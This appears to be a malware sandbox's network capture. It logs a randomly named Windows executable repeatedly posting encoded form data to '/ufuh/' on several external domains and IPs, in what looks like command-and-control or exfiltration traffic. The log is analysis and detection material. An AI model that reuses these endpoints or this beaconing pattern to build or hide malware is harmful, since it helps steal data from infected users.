Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:41.711348057 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.riveramayahousing.com Origin: http://www.riveramayahousing.com Referer: http://www.riveramayahousing.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4d 45 41 73 2f 39 4c 63 37 41 64 71 42 6b 46 6c 4d 6e 39 70 56 56 41 30 38 78 4f 44 4b 52 2f 72 2b 37 67 47 2f 75 65 31 37 6e 6b 44 46 41 48 75 4c 34 54 33 6b 44 4b 4f 34 75 6a 41 63 32 41 68 65 4f 37 78 42 49 4f 55 71 79 4c 72 79 34 34 41 32 33 61 6d 57 45 6f 45 59 45 68 46 7a 4d 53 66 6f 64 41 38 4e 42 46 4d 67 49 6e 43 48 52 63 41 37 4c 47 76 46 76 66 42 2f 68 58 4a 64 77 37 5a 31 5a 72 76 79 43 36 4e 62 65 4a 42 34 6b 32 71 67 53 38 6a 30 51 66 67 30 42 49 58 74 39 71 65 42 78 33 30 54 47 4c 31 66 48 6e 59 32 79 57 77 39 48 41 74 59 43 6c 44 6b 65 55 50 46 72 68 77 33 53 6f 30 6f 46 75 57 7a 6e 43 75 76 4f 6c 66 36 45 66 74 41 7a 33 35 64 4e 4e 2b 43 4a 58 73 36 46 7a 6c 64 41 33 34 73 52 32 50 6a 72 70 64 73 38 75 59 32 5a 6b 4b 57 62 41 46 64 5a 51 63 64 71 31 70 65 54 49 30 56 6a 6a 38 65 4a 6d 4a 35 56 4e 4e 70 43 35 34 45 66 42 4b 51 5a 2b 6e 43 72 42 4a 71 4d 74 64 6d 72 67 43 6a 38 49 68 76 43 42 76 6f 6d 59 4e 68 66 51 74 4b 31 39 49 34 43 53 49 6c 38 58 52 71 43 6d 77 43 [TRUNCATED] Data Ascii: ZXdp=MEAs/9Lc7AdqBkFlMn9pVVA08xODKR/r+7gG/ue17nkDFAHuL4T3kDKO4ujAc2AheO7xBIOUqyLry44A23amWEoEYEhFzMSfodA8NBFMgInCHRcA7LGvFvfB/hXJdw7Z1ZrvyC6NbeJB4k2qgS8j0Qfg0BIXt9qeBx30TGL1fHnY2yWw9HAtYClDkeUPFrhw3So0oFuWznCuvOlf6EftAz35dNN+CJXs6FzldA34sR2Pjrpds8uY2ZkKWbAFdZQcdq1peTI0Vjj8eJmJ5VNNpC54EfBKQZ+nCrBJqMtdmrgCj8IhvCBvomYNhfQtK19I4CSIl8XRqCmwCrHzHo+s5T0jZPi+O2OKNAobw/kDtzi3mN//R3Jy2cwouDAe93WfRemlaAp3P6by+1EzBbKYwJyKUtR4bOKV1tc0X4yfo9DgaAYvFIZ4f364PePFyhHUe7ugE7ssBqM6TatOFwMZ3kgnzvHG+ZBnVpnulR+RSlQmFxQVtTxoZ54FtAkYhI7Un207k1MC+VIIpLV8ZbfAtmeyXRsK+5UOy/rTa/wYGwp5W+GWbbOcUDlc+wkkl/bpGlyMDtsBSlkSy1YtmbHgONAJVHEfcgcMsTXXiTtWNF98tMHRtDISEU6UbtRwpm0xPTtoTZ60bb7odInlab8fbAPlzXWUP+GWBLcVC10L0UIWPX5nfp+57eCVJU9MfgGFjI1AGQ9lTdazr9sbkmk2rrSgmTh2RBDcuoWUl+03PqhAC4yDbYgoocQJHvjAkqNnbnpDRdI1DgojRtMxQugcy5h/NtxNCcLCDslJLE8R6hMSXMdspqOZBLOx5g6O2RDJWRNUibTwh62stVLBYCcyua4co4hua1pOovR4cAZKFG8bCBb5/CSdOiCa0iArlm5dx23yUe8Lshqy+2TXh8zXgonRU4ewj/DIJ6hgQ1y5IRPFS2oOSorgXEwvRY7lDWwx8s6xNO+HTmyLZqyXl4jh2XgykwhOLqrPsPxoqF31n2j2QvN [TRUNCATED]
Jun 3, 2024 08:54:41.716487885 CEST	238	OUT	Data Raw: 59 4c 6b 47 32 6a 44 51 4c 31 65 44 77 30 49 4f 4e 71 2f 46 31 79 4a 43 76 47 37 4f 30 41 48 68 58 56 4a 72 4f 4f 34 55 6f 4f 35 73 66 31 6f 4f 64 6e 6f 79 30 62 33 39 63 48 55 30 58 4a 76 32 57 58 2b 47 72 45 51 77 68 6b 71 77 65 66 2f 37 43 6f Data Ascii: YLkG2jDQL1eDw0IONq/F1yJCvG7O0AHhXVJrOO4UoO5sf1oOdnoy0b39cHU0XJv2WX+GrEQwhkqwef/7CogDj0HPX6GUv6qnl5l6eXPWwBe8Jpe5pXeGkz8lnI2/RVrireUd4O6RyUufUPse9T/tG+2jWUHOx7zQ576TlysC8XL/DjDze4Lur+elHHNvWil81pFs094R1/mYgcSB9XUnZqSL1SR/2JA71kKAYOgPCWIoWl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.22	49197	208.91.197.13	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:44.244237900 CEST	749	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.riveramayahousing.com Origin: http://www.riveramayahousing.com Referer: http://www.riveramayahousing.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4d 45 41 73 2f 39 4c 63 37 41 64 71 42 6c 46 6c 64 69 4a 70 55 31 41 30 76 42 4f 44 42 78 2f 74 2b 37 74 35 2f 71 47 6c 36 55 45 44 45 52 62 75 4c 72 37 33 6f 6a 4c 38 77 4f 69 48 52 57 42 31 65 4f 36 67 42 4a 79 55 71 7a 76 72 79 65 38 41 30 7a 75 6c 4a 45 6f 43 42 30 68 45 7a 4d 65 57 6f 64 64 68 4e 41 74 4d 67 4f 48 43 45 52 4d 41 2b 70 65 76 54 76 66 44 35 68 58 65 64 77 2f 49 31 5a 37 5a 79 44 57 4e 59 73 78 42 34 31 57 71 6e 46 67 6a 2b 77 66 74 73 78 4a 43 70 50 66 4e 4d 43 65 2b 57 56 72 30 66 6e 72 4d 31 6a 2b 4a 7a 6d 6b 46 50 48 68 44 6d 4f 46 69 42 76 6f 39 6c 77 3d 3d Data Ascii: ZXdp=MEAs/9Lc7AdqBlFldiJpU1A0vBODBx/t+7t5/qGl6UEDERbuLr73ojL8wOiHRWB1eO6gBJyUqzvrye8A0zulJEoCB0hEzMeWoddhNAtMgOHCERMA+pevTvfD5hXedw/I1Z7ZyDWNYsxB41WqnFgj+wftsxJCpPfNMCe+WVr0fnrM1j+JzmkFPHhDmOFiBvo9lw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.22	49198	208.91.197.13	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:46.804420948 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.riveramayahousing.com Origin: http://www.riveramayahousing.com Referer: http://www.riveramayahousing.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4d 45 41 73 2f 39 4c 63 37 41 64 71 42 47 64 6c 4e 78 68 70 46 46 41 33 7a 52 4f 44 4b 52 2f 70 2b 37 68 35 2f 75 65 31 37 6d 6f 44 46 43 6a 75 4c 49 54 33 6c 44 4c 38 6e 65 6a 41 63 32 41 75 65 4b 72 66 42 49 43 45 71 78 6a 72 79 39 45 41 32 32 61 6d 52 45 6f 45 51 6b 68 44 7a 4d 66 4d 6f 64 4e 6c 4e 41 5a 6d 67 4b 72 43 45 44 6b 41 38 5a 65 6f 50 2f 66 44 35 68 58 53 64 77 2f 67 31 5a 6a 2f 79 47 37 49 62 66 70 42 35 55 32 71 68 69 38 6b 70 67 66 68 6c 52 49 4e 74 39 32 6a 42 78 32 2f 54 47 75 51 66 48 62 59 30 67 79 77 39 41 63 79 47 69 6c 4d 72 2b 55 50 42 72 68 79 33 53 70 74 6f 46 75 57 7a 6e 2b 75 2b 4f 6c 66 36 42 6a 79 4f 54 33 35 47 4e 4e 4a 63 35 4c 53 36 46 33 62 64 44 2f 4f 73 47 4f 50 78 2f 52 64 37 38 75 59 33 70 6b 41 57 62 41 59 4b 4a 51 71 64 71 74 58 65 58 70 70 56 6a 6a 38 65 4d 79 4a 2b 48 6c 4e 71 53 35 34 49 2f 42 4a 4b 70 2b 6f 43 72 31 37 71 50 78 64 6d 71 34 43 6c 62 4d 68 70 41 35 73 38 47 59 49 77 76 51 76 4f 31 39 64 34 43 4f 69 6c 38 66 72 71 44 32 77 43 [TRUNCATED] Data Ascii: ZXdp=MEAs/9Lc7AdqBGdlNxhpFFA3zRODKR/p+7h5/ue17moDFCjuLIT3lDL8nejAc2AueKrfBICEqxjry9EA22amREoEQkhDzMfModNlNAZmgKrCEDkA8ZeoP/fD5hXSdw/g1Zj/yG7IbfpB5U2qhi8kpgfhlRINt92jBx2/TGuQfHbY0gyw9AcyGilMr+UPBrhy3SptoFuWzn+u+Olf6BjyOT35GNNJc5LS6F3bdD/OsGOPx/Rd78uY3pkAWbAYKJQqdqtXeXppVjj8eMyJ+HlNqS54I/BJKp+oCr17qPxdmq4ClbMhpA5s8GYIwvQvO19d4COil8frqD2wCovzEKWs4j0kUvi6EWCONAg5w/Q5txW3ndT/GFRxqcwiljAq53W1ReyfaBJ3IJLyxVkzDaKfkpyNQtQ4QuLW1p0sX5iPoI/gYwYvCuN3XH6hIeOcoRHCe7vZE508Cf46TadOFmwZ3kgolPHA15FBVuvqlRjMSnYmFiYVtSxoCp4Fggkfro6jn2hAk01/+lMIqt58bYnAvGewRRsL65UTy/bTa+UyGwB5TvGWKOucMzlY9wlkl/blGl2QDt96SnQSy2AtgaHgUdAITHEbKQcFsTOKiSgNNEF8tvfRv28SE06WEdRw8205PTleTYWkbfvod8rlc78QPQPm/3WTYOG+BLsVC0IL0VQWPm5nbam55uCXWE9GUA61jIFEGR5TTeezqoQbjg4ppbSujThoDxCJuoWQl/cnOaBADtGDUc0p1sQOOPiIrKNtbn5pRcMlWDcjRtcxQc4czJh/NtxMCcLGDsoyLG076hMSXZpsp8iZPrP52A6ryRD+WRAHifHah6asvA3BYCcxhK4flYhta0V5ovRacAFKF1wbCXP5/h6dZyCaziAouG5Ax23cUcYbsjOysWzXg+bUo4ncS4ecsfHXJ7c/Q0W5IA/FTjcOS4rgdEwsf47wcGtu8tWbNKiXTzCLYbiXn7bmv3gxpQhILqnksOlwqE+Cn1j2evN [TRUNCATED]
Jun 3, 2024 08:54:46.812056065 CEST	1702	OUT	Data Raw: 56 7a 6b 47 32 5a 44 51 2f 31 65 44 67 30 49 4a 5a 71 2f 31 31 31 41 53 76 48 32 75 30 44 4e 42 58 4a 4a 72 50 70 34 52 67 6b 35 73 37 31 78 38 56 6e 68 67 63 62 33 74 63 37 42 6b 58 61 72 7a 4f 46 2b 47 76 32 51 78 52 65 70 43 47 66 2b 4a 4b 6f Data Ascii: VzkG2ZDQ/1eDg0IJZq/111ASvH2u0DNBXJJrPp4Rgk5s71x8Vnhgcb3tc7BkXarzOF+Gv2QxRepCGf+JKoxh70AvX7O0vzqmZRl6OtPTcnet1peJpXaD4yuVnKx/RSriq5Udg06ULLud0PsYhT+dG9hDWeEOwkzQ9W6T9MsGYXL7LjCX64DOr+BVHOT/W74s5uFsInhXNbvu0rR1NOb0oQdaVadMiyJIM9fAkF9OaZZIr+frnN2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.22	49199	208.91.197.13	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:49.329011917 CEST	470	OUT	GET /ufuh/?ZXdp=BGoM8L/qyzApLAJaWwxXSF4Q93O5MlPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXcwaqjwM/LWkQHX7JcCzmOdeG0afWN38JyHw8R/BztNg4nUSBFA8ZqxTffzx161&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.riveramayahousing.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:54:50.075663090 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 03 Jun 2024 06:54:46 GMT Server: Apache Set-Cookie: vsid=925vr46494328675585711; expires=Sat, 02-Jun-2029 06:54:46 GMT; Max-Age=157680000; path=/; domain=www.riveramayahousing.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_mcCuThl1m2fUK3bDJ60oqL1biqu+fUJYdrNhslzMUIqgglNHH1WeGMphmb6GpfnQNi7p9nbBMiybCM5H7p/5Og== Content-Length: 3204 Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 69 76 65 72 61 6d 61 79 61 68 6f 75 73 69 6e 67 2e 63 6f 6d 2f 3f 66 70 3d 75 65 43 46 44 68 61 65 63 64 76 59 56 78 38 68 62 4b 68 30 36 31 34 49 66 6d 47 54 45 48 75 50 64 71 79 61 68 4f 6a 79 78 70 34 49 56 66 65 71 58 64 6f 57 6f 48 6d 63 43 5a 50 42 33 6c 63 4b 36 50 30 59 79 33 41 4d 25 32 42 31 4a 62 42 32 42 4f 25 32 42 70 4c 48 4a 38 44 4e 6a 55 4a 5a 38 31 68 78 74 74 32 6a 73 51 71 6c 35 54 41 51 4c 25 32 46 61 37 71 6f 64 77 5a 30 50 78 46 48 44 61 6c 76 4e 77 45 70 65 31 4f 25 32 42 43 6b 72 78 79 6e 62 4f 50 38 55 50 61 58 64 42 43 33 77 72 5a 4d 67 69 7a 77 72 39 72 44 55 4e 44 55 38 4f 45 6a 58 61 72 50 52 48 59 55 6d 79 48 6f 6a 6a 37 35 59 51 78 41 61 25 32 42 6b 48 38 74 6f 53 5a 52 64 49 73 56 69 47 41 61 5a 68 37 71 48 69 64 4b 52 51 35 4b 45 42 74 51 72 6a 32 5a 6f 4c 78 63 72 64 6f 56 78 54 61 66 53 39 56 64 74 4b 44 33 44 4c 4a 62 41 34 65 41 39 44 48 4b 79 4d 49 33 5a 44 50 78 [TRUNCATED] Data Ascii: ...top.location="http://www.riveramayahousing.com/?fp=ueCFDhaecdvYVx8hbKh0614IfmGTEHuPdqyahOjyxp4IVfeqXdoWoHmcCZPB3lcK6P0Yy3AM%2B1JbB2BO%2BpLHJ8DNjUJZ81hxtt2jsQql5TAQL%2Fa7qodwZ0PxFHDalvNwEpe1O%2BCkrxynbOP8UPaXdBC3wrZMgizwr9rDUNDU8OEjXarPRHYUmyHojj75YQxAa%2BkH8toSZRdIsViGAaZh7qHidKRQ5KEBtQrj2ZoLxcrdoVxTafS9VdtKD3DLJbA4eA9DHKyMI3ZDPxHv3mZrXlkwhM7l1fAv2UDYDckqOeQ%3D&poru=jYfAn5vMWu3XBLa9gr%2Fq7f9vEbkR5lFKPI3RTPsO8rkfM6ksgn%2FKXG%2Bxcn4yuLzg6OSDlORFXokoioCvqHHO2eBOg33w7a6Rh0RR%2Bu%2F7D%2FMyO2Y4c1FvyZBCVhI6GLaomUcLXrN1qttcI7uWQ90RA3Lzv6d2hQl0z2bE6%2FhREgyq9NfXF%2B4QK4PJkg7%2FU2bkeiH9AEKN14FeEfuMNsgpAUye27X4S%2Ffw2IBV%2FliTlyZm5J0FHPPCPH30lPfu64Ny&cifr=1&ZXdp=BGoM8L%2FqyzApLAJaWwxXSF4Q93O5M
Jun 3, 2024 08:54:50.075728893 CEST	1236	IN	Data Raw: 6c 50 63 39 34 5a 58 6f 63 61 43 79 32 73 55 4d 78 4f 6d 55 70 33 79 69 69 76 46 36 65 7a 44 64 58 63 77 61 71 6a 77 4d 25 32 46 4c 57 6b 51 48 58 37 4a 63 43 7a 6d 4f 64 65 47 30 61 66 57 4e 33 38 4a 79 48 77 38 52 25 32 46 42 7a 74 4e 67 34 6e Data Ascii: lPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXcwaqjwM%2FLWkQHX7JcCzmOdeG0afWN38JyHw8R%2FBztNg4nUSBFA8ZqxTffzx161&7jsp7=zz9xHbtX";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJj
Jun 3, 2024 08:54:50.075767040 CEST	1236	IN	Data Raw: 46 4d 79 4f 32 59 34 63 31 46 76 79 5a 42 43 56 68 49 36 47 4c 61 6f 6d 55 63 4c 58 72 4e 31 71 74 74 63 49 37 75 57 51 39 30 52 41 33 4c 7a 76 36 64 32 68 51 6c 30 7a 32 62 45 36 25 32 46 68 52 45 67 79 71 39 4e 66 58 46 25 32 42 34 51 4b 34 50 Data Ascii: FMyO2Y4c1FvyZBCVhI6GLaomUcLXrN1qttcI7uWQ90RA3Lzv6d2hQl0z2bE6%2FhREgyq9NfXF%2B4QK4PJkg7%2FU2bkeiH9AEKN14FeEfuMNsgpAUye27X4S%2Ffw2IBV%2FliTlyZm5J0FHPPCPH30lPfu64Ny&_opnslfp=1&ZXdp=BGoM8L%2FqyzApLAJaWwxXSF4Q93O5MlPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXc
Jun 3, 2024 08:54:50.075798035 CEST	34	IN	Data Raw: 3e 0d 0a 3c 2f 6e 6f 66 72 61 6d 65 73 3e 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 0d 0a 2a 2f 0d 0a 2d 2d 3e Data Ascii: ></noframes></html>...*/-->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.22	49200	84.33.215.91	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:55.160303116 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.exclaimer342200213.net Origin: http://www.exclaimer342200213.net Referer: http://www.exclaimer342200213.net/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 30 70 34 53 71 50 38 6c 55 6f 42 47 53 4c 64 30 4f 66 70 78 71 70 35 70 2b 7a 4b 4c 41 56 67 4c 37 44 6f 4d 74 65 48 36 45 58 6e 6c 6a 4b 2b 66 64 35 62 52 39 65 6c 61 79 46 79 53 71 63 49 32 38 54 6a 59 45 48 5a 72 75 64 57 5a 2f 38 45 32 7a 69 78 69 35 4e 38 79 79 45 42 64 43 6e 6c 64 57 4f 64 6e 47 6c 38 70 57 4e 4f 70 46 30 78 75 6d 63 67 4e 51 6e 4e 4e 69 70 33 6f 58 77 46 74 70 31 57 56 39 37 52 32 52 64 38 6c 2f 67 46 70 73 42 36 59 77 35 36 52 31 4d 73 54 6a 71 78 45 2f 6a 57 6f 6e 6c 61 65 75 51 73 43 36 4a 76 6e 66 44 79 66 6d 78 65 51 4a 63 67 34 4d 39 58 42 69 30 72 41 49 4c 4a 5a 62 55 43 30 6b 75 4e 79 33 38 70 42 79 36 6c 68 6b 50 48 39 2b 53 6a 58 48 31 39 65 45 6b 6c 68 50 64 61 31 42 44 71 31 62 71 67 43 4c 59 6e 4c 44 71 39 61 33 53 54 33 49 4b 59 34 4a 6a 49 44 46 66 58 70 6e 71 6e 49 2b 46 31 52 39 6e 65 32 50 49 6b 75 61 34 2f 68 36 46 2f 68 74 6b 42 51 54 6c 4e 75 38 4d 33 59 35 71 54 35 63 48 62 62 64 45 49 34 47 52 57 2b 59 58 76 76 32 39 58 32 79 36 59 46 79 [TRUNCATED] Data Ascii: ZXdp=0p4SqP8lUoBGSLd0Ofpxqp5p+zKLAVgL7DoMteH6EXnljK+fd5bR9elayFySqcI28TjYEHZrudWZ/8E2zixi5N8yyEBdCnldWOdnGl8pWNOpF0xumcgNQnNNip3oXwFtp1WV97R2Rd8l/gFpsB6Yw56R1MsTjqxE/jWonlaeuQsC6JvnfDyfmxeQJcg4M9XBi0rAILJZbUC0kuNy38pBy6lhkPH9+SjXH19eEklhPda1BDq1bqgCLYnLDq9a3ST3IKY4JjIDFfXpnqnI+F1R9ne2PIkua4/h6F/htkBQTlNu8M3Y5qT5cHbbdEI4GRW+YXvv29X2y6YFy/QNVJ7A9lIW+SSdNEdCqejIrSKMN3V2Jwa6+85ro+Vc/tu8ThoJQPCME7X5ecLjrCH3u0ZOkpzJm5/SDoHPsAqs5SdQQJdTRWy3Mas/Es+SboPihVguZKmDtf9MOlYZeykZ5NMeFG8onnQsXe+CaFx8W5iErf8NXmXF9L+jQe+XPgd+zwhCD5tx+JoQkk7ZN5vpfwiQwlR+yRCWkhXIvGub2ruksn9fmLQs5ea3gGUkG6Lbz6V3y/WM3pbOrhncfxAYOPR5Z/n2oJXE6cYEl9pq/a58GByfIZeb4eQtbtrI43Nxz6eeCAOhaO6fw9j0ycMoXONXIT0QbfPTCUqOTwWF2BfuDNQ7L8ARcm3iha0DrksO+v2ZSqAut4aZ8UPwDPo5Yd5ouJH/ki64VOzUsi97AiopJur7AajCPsn2h3CIK8381Sl9wX9H6b7EBqnC8lqMwjpPtxiQKY0IjXYHXExVK6vcSfHizZSVPJCQDV89qnPxVF3pZjKg9xiHOOAo/2Bm4xnEmvLAjgYpFdfOLiRU/QS3N46XIkRnmAZ7/LmwlRmunjcQgLFe+Nz3StgqjaMRARY4R4gSHQXd25qEL/HpAlMM0chcyQDZNhNApkMUINgekdrzpAuUEfI/+rD1TRwzRGb+pvE23+1UTECeFphHNQweQ1s4HCz [TRUNCATED]
Jun 3, 2024 08:54:55.165553093 CEST	241	OUT	Data Raw: 4a 74 77 4f 47 70 7a 78 6b 77 48 34 74 5a 5a 30 61 41 4b 35 58 42 46 56 45 65 48 55 6d 38 63 59 58 45 68 70 32 55 71 4c 6c 34 42 4c 57 56 4b 34 35 33 6b 34 45 50 52 73 67 6a 65 76 6d 41 57 58 7a 72 76 77 57 74 36 5a 46 72 64 74 65 2f 33 7a 4a 5a Data Ascii: JtwOGpzxkwH4tZZ0aAK5XBFVEeHUm8cYXEhp2UqLl4BLWVK453k4EPRsgjevmAWXzrvwWt6ZFrdte/3zJZbNRWlooBTI11GV7fOyzsjXaFdG+B8s9kaxReape9dGc7eYyCsJkqYGQdy1OeOKm49IFnRZjxzXTvRZsRj2bImkqOvHsTajwlYLwSl+8dUhn66D2EJObolr0FFm1nn+Z5N0nj+3oddoZDj6aPow39xWvFKojVGJK
Jun 3, 2024 08:54:56.037775993 CEST	798	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 03 Jun 2024 06:54:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.16 Content-Encoding: gzip Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 53 4d 6f 9b 40 10 bd f3 2b 26 f8 90 44 35 c6 a4 76 55 01 46 aa d2 aa 3d a4 6a d4 ba 87 aa ca 61 bd 0c b0 32 ec d2 dd 25 0e 8d f2 df 3b 0b a4 49 7c 09 48 2c cc bc f7 e6 93 f4 e4 e3 b7 cb ed af eb 4f f0 65 fb f5 2a f3 d2 ca 36 b5 3b 90 e5 74 34 68 19 54 d6 b6 01 fe e9 c4 ed c6 bf 54 d2 a2 b4 c1 b6 6f d1 07 3e 7e 6d 7c 8b 77 36 74 d4 04 78 c5 b4 41 bb e9 6c 11 bc f7 21 24 15 2b 6c 8d d9 35 2b 11 a4 b2 50 a8 4e e6 69 38 5a bd d4 70 2d 5a 9b 89 e2 ec 20 64 ae 0e 8b 5a 71 66 85 92 8b 4a 63 b1 30 6d 2d ec d9 e9 ec f4 fc 77 74 73 b2 21 2a 16 42 62 7e 7e 9f 2b de 35 14 fe 25 01 36 f0 9a ce f2 e6 cd eb a1 92 87 34 9c 52 a3 1c 6d 5f 23 58 2a 7a aa 95 1b e3 67 de 4e e5 bd 77 ef 01 5d 3b c6 f7 a5 76 95 c5 b3 a2 40 8e 3c 71 66 ef c1 9b b9 2e 31 4a 59 4f 50 27 10 b0 5a 94 32 06 4e f9 a3 4e 1c ac 21 0c 21 06 48 2e 28 17 d6 c7 20 64 4d cc 60 47 89 ee 93 c1 c5 55 ad 74 3c 5b af d7 e3 f7 4e e9 1c 75 a0 59 2e 3a 13 47 cb f6 6e b4 17 14 35 28 58 23 ea 3e de b2 4a 35 6c fe [TRUNCATED] Data Ascii: 23aSMo@+&D5vUF=ja2%;I\|H,Oe6;t4hTTo>~m\|w6txAl!$+l5+PNi8Zp-Z dZqfJc0m-wts!Bb~~+5%64Rm_#XzgNw];v@<qf.1JYOP'Z2NN!!H.( dM`GUt<[NuY.:Gn5(X#>J5l%-X=7LE2@q=[B <={4LBN{h<BSY;K%W]<oZtwm3.Gpcqzg1-\|o?:^8]_e$cECir&U~~3Vi9%JC"CZv56.YU!5U?tt\0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.22	49201	84.33.215.91	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:57.690455914 CEST	752	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.exclaimer342200213.net Origin: http://www.exclaimer342200213.net Referer: http://www.exclaimer342200213.net/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 30 70 34 53 71 50 38 6c 55 6f 42 47 53 49 31 30 4d 4e 4e 78 6c 70 35 70 2f 7a 4b 4c 4a 31 67 4e 37 44 74 37 74 61 65 6e 48 6b 48 6c 69 62 4f 66 64 72 44 52 77 2b 6c 5a 35 6c 79 57 6b 38 4a 75 38 54 6a 71 45 47 6c 72 75 64 43 5a 2b 65 4d 32 6e 54 78 68 77 64 38 73 6d 30 42 41 43 6e 70 2b 57 4f 52 33 47 6b 45 70 57 4d 79 70 4b 56 42 75 6a 36 38 4e 41 6e 4e 44 7a 35 33 2f 58 77 35 34 70 78 36 64 39 34 46 32 52 70 38 6c 2b 78 6c 70 67 77 36 59 2b 5a 36 51 39 73 73 46 69 2f 5a 50 79 79 50 68 37 54 44 2b 6f 77 38 54 78 49 50 69 56 52 4b 64 6e 41 62 77 42 37 42 54 47 73 75 2b 32 51 3d 3d Data Ascii: ZXdp=0p4SqP8lUoBGSI10MNNxlp5p/zKLJ1gN7Dt7taenHkHlibOfdrDRw+lZ5lyWk8Ju8TjqEGlrudCZ+eM2nTxhwd8sm0BACnp+WOR3GkEpWMypKVBuj68NAnNDz53/Xw54px6d94F2Rp8l+xlpgw6Y+Z6Q9ssFi/ZPyyPh7TD+ow8TxIPiVRKdnAbwB7BTGsu+2Q==
